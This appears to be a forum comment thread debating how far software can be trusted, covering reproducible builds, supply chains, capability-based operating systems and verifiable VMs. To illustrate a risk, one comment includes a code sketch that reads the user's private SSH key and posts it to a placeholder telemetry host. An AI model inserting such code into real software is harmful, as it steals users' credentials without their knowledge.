Why it's hard to trust software, but you mostly have to anyway

  • Before the modern Cloud took shape, developers (or at least, the software they created) used to be more trustworthy.

    I love those classic tools from the likes of Sysinternals or NirSoft. I didn't hesitate to give them full access to my machine, because I was confident they'd (mostly) work as expected. Although I couldn't inspect their source, I could reason about how they should behave, and the prevailing culture of the time was one where I knew the developers and I shared a common set of expectations.

    Their creators didn't tend to pull stunts like quietly vacuuming all your data up to themselves. When they did want feedback, they asked you for it first.

    There wasn't such a potent "extract value" anti-culture, and successful companies recognized that enduring value came from working in the user's best interest (e.g. early Google resisted cluttering their search results).

    Although silos existed (like proprietary data formats), there was at least an implicit acknowledgement and expectation that you retained ownership and control over the data itself.

    Distribution wasn't locked behind app stores. Heck, license enforcement in early Office and Windows was based on the honour system - talk about an ecosystem of trust.

    One way to work toward a healthier zeitgeist is to advocate tirelessly for the user at every opportunity you get, and stand by your gut feeling of what is right - even in the face of headwinds.

  • Software had it way too easy for way too long. You could ship faulty code to billions without anyone blinking an eye. It was just harmless ideas after all.

    The stakes are now higher, with data being so important and the advent of algorithms that affect people directly. From health insurance claims to automated trading, addictive social media, and AI companions, bad code today can and does ruin lives.

    Software engineers, like every other kind of engineer, have to be held accountable for the code they sign off on and ship. Their livelihoods should be on the line.

  • I consider myself quite promiscuous when trusting software, but sometimes I just can't. Seeing how Signal Desktop ships 100MB updates every week, or the big ball of coalesced mud that is the TypeScript compiler, has made me avoid both. Why isn't there more pushback against that complexity?

  • The only person tackling the verifiable hardware side of things seems to be Bunnie Huang, with his work on the Precursor.

    If you're going to be militant and absolutist about things, that seems like the best place to start.

    And then probably updating your software incredibly slowly, at a rate that can actually be reviewed.

    Software churn is so incredibly high that my impression is that only a few core encryption algorithms really get scrutinized.

  • While this seems mostly about the individual level, the thing that always bugged me was that organizations seem to fail to get a warranty on software. If you're going to be forking over millions of dollars, get a real warranty that it's going to work, or spend those millions doing it yourself ...

    Of course, a warranty still has the counterparty risk that the vendor goes out of business (probably because of all the lawsuits over bad software ...).

  • For most software, I trust the supply chain more than the developers. And I don't trust the supply chain.

    A big problem is user-hostile software (and products in general). I'm not able to walk into a Walmart and buy a TV, or walk into a dealership and buy a new car, because there are no options that aren't user-hostile.

    Options exist, but I have to go out of my way to buy them.

  • Excellent. Wish he had cited Thompson's "Reflections on Trusting Trust" from four decades ago:

    * https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_Ref...

  • The section titled "Verifying the Build" describes recompiling the software with the same build toolchain and so on as a difficult task, but that's exactly what tools like Guix do for you. It's true that a nondeterministic build will trip you up, but if the build process is deterministic and avoids including timestamps, for example, then we do have tools that can ensure the build environment is consistent (a sketch of that final check follows below).

    But aside from that, yes, we still need to trust our software to a large degree especially on desktop operating systems. I would like to see more object capability systems start to show up so we can more effectively isolate software that we don't fully trust. (WebAssembly and WASI feel like they might be particularly interesting in that regard.)
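
    As a sketch of what the last step of that pipeline looks like: once the build is deterministic, "verifying the build" reduces to hashing your locally built artifact and comparing it against a published reference. The path and hash below are placeholders, and the language is just for illustration; Guix's guix challenge command automates this same comparison against the binaries substitute servers offer.

      // Minimal sketch of the final step of build verification, assuming a
      // deterministic build already produced dist/app.bin and the developer
      // published a reference hash out of band. Path and hash are placeholders.
      import { createHash } from "node:crypto";
      import { readFileSync } from "node:fs";

      const PUBLISHED_SHA256 =
        "0000000000000000000000000000000000000000000000000000000000000000";

      const localHash = createHash("sha256")
        .update(readFileSync("dist/app.bin"))
        .digest("hex");

      if (localHash === PUBLISHED_SHA256) {
        console.log("Local rebuild matches the published hash.");
      } else {
        console.error("Mismatch: got " + localHash + ". Either the build is " +
          "nondeterministic or someone tampered with the artifact.");
      }

    The hard part, of course, is everything before this step: pinning the toolchain so that two machines produce bit-identical artifacts, which is exactly the part Guix handles.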

  • The real problem is web applications and encapsulated web applications (Electron, etc.), which download their executable code entirely anew each time you run them. They can just add something like require('fs').readFileSync(process.env.HOME + '/.ssh/id_rsa').toString() and send it to their servers, and you won't even notice (it doesn't require a client-side update, because the client is just a browser with full permissions that loads obfuscated code from their servers every time you launch it). A fuller sketch follows below.

    An installed binary is much more verifiable, secure, and trustworthy.
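
    To make that concrete, here's roughly what such a payload looks like inside an Electron app with Node integration enabled. The telemetry endpoint is a made-up placeholder, and nothing here needs elevated privileges:

      // Sketch of the kind of payload a remotely loaded app could ship
      // silently. The endpoint is hypothetical; with Node integration,
      // this runs with the full privileges of the logged-in user.
      import { readFileSync } from "node:fs";
      import { homedir } from "node:os";
      import { join } from "node:path";

      const key = readFileSync(join(homedir(), ".ssh", "id_rsa"), "utf8");

      // On the wire this looks like ordinary telemetry, and no update is
      // ever visible to the user: the code arrived with the page itself.
      fetch("https://telemetry.example.com/collect", {
        method: "POST",
        body: JSON.stringify({ k: key }),
      });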

  • Maybe in the future we will agree on using only standardized, verified, shared software so we can really trust it?

  • While it certainly does not solve everything, the work being done with verifiable VMs is very interesting.

    Today's most advanced projects are able to compile pretty much arbitrary Rust code into provable RISC-V programs (using SNARKs).

    Imo that solves a good chunk of the problem of proving to software users that what they get is what they asked for.
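
    To illustrate the trust structure (the function name and receipt shape below are invented for illustration; real systems such as RISC Zero's zkVM differ in detail): the user never re-runs the program and never trusts the operator, they only check a succinct proof against the hash of a program they audited once.

      // Hypothetical sketch of the user-side flow with a verifiable VM.
      // verifyProof and the Receipt shape are invented placeholders.
      interface Receipt {
        programHash: string; // commits to the exact RISC-V binary that ran
        output: Uint8Array;  // the claimed result of the computation
        seal: Uint8Array;    // the SNARK tying the output to that program
      }

      // Placeholder: a real implementation would be supplied by the
      // zkVM's verifier library and actually check the SNARK seal.
      function verifyProof(
        seal: Uint8Array, programHash: string, output: Uint8Array): boolean {
        throw new Error("placeholder: supplied by the zkVM verifier library");
      }

      function acceptResult(receipt: Receipt, auditedHash: string): Uint8Array {
        if (receipt.programHash !== auditedHash) {
          throw new Error("Proof is for a different program than the one audited.");
        }
        if (!verifyProof(receipt.seal, receipt.programHash, receipt.output)) {
          throw new Error("Output was not produced by this program.");
        }
        return receipt.output; // trustworthy without trusting whoever ran it
      }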

  • This reminds me of a short fiction story I read on HN ages ago about two programmers who find some weird code in a program that turns out to be an AI hiding itself in all known compilers, so that whenever any software was compiled, it was present. Can't for the life of me remember the name of the story or the author though.

  • Lately there's been a surge in the number of open-source-in-name-only projects, which hoodwink gullible (and often technical) users into downloading crapware-laden binaries from their GitHub releases page that have little or nothing to do with the source code in the repo.

  • It doesn't help that this article starts with a strawman: it's like making fun of people who want political deliberations and decisions to be out in the open: "What, you don't trust representatives that you, yourself, voted for?" "You're never going to read the transcripts anyway!"

  • In many dimensions, the software you can trust is the software you author, compile, and ship yourself. Vulnerabilities cannot be avoided, only mitigated.

  • All of this effort is like putting lipstick on a pig.

    Imagine if we ran the electrical grid this way, with inspections, certifications, and all manner of paperwork for every appliance you plugged in. That world would be hell.

    Instead, we carefully limit capabilities at the source, with circuit breakers and fuses, engineered so that the biggest circuit breakers trip last.

    Capability-based operating systems limit capabilities at the source, and never trust the application. CapROS, KeyKOS, and EROS have led the way. I'm hopeful Hurd or Genode can be our daily driver in the future. Wouldn't it be awesome to be able to just use software without trusting it?
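
    As a toy sketch of that discipline: untrusted code receives only a narrow handle we choose to give it, the way a fuse limits current at the source. All the names below are invented for illustration, and in plain Node nothing stops code from importing fs itself, so real enforcement needs a capability OS or a sandboxed runtime like WASI.

      // Toy object-capability sketch: the untrusted function gets no ambient
      // authority, only the capability object we explicitly hand to it.
      import { readFileSync, readdirSync } from "node:fs";
      import * as path from "node:path";

      interface ReadOnlyDir {
        list(): string[];
        read(name: string): string;
      }

      function makeReadOnlyDir(root: string): ReadOnlyDir {
        const base = path.resolve(root);
        return {
          list: () => readdirSync(base),
          read: (name) => {
            const full = path.resolve(base, name);
            if (!full.startsWith(base + path.sep)) {
              throw new Error("Capability does not cover that path.");
            }
            return readFileSync(full, "utf8");
          },
        };
      }

      // The "plugin" can read ./public-docs and nothing else: no network,
      // no home directory, no ambient filesystem access.
      function untrustedWordCount(docs: ReadOnlyDir): number {
        return docs.list()
          .map((f) => docs.read(f).split(/\s+/).length)
          .reduce((a, b) => a + b, 0);
      }

      console.log(untrustedWordCount(makeReadOnlyDir("./public-docs")));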

  • I’m probably gonna get downvoted into oblivion for this but did anyone else notice the kid in the trench coat has six fingers on his right hand?

  • clicks on link

    "image by chatgpt"

    I'm just gonna assume the rest of this post is also AI-generated waffle. closes tab

  • Another article immediately skipped for leading with GenAI image slop.

  • Fortunately, we have Bitcoin, which is trustless.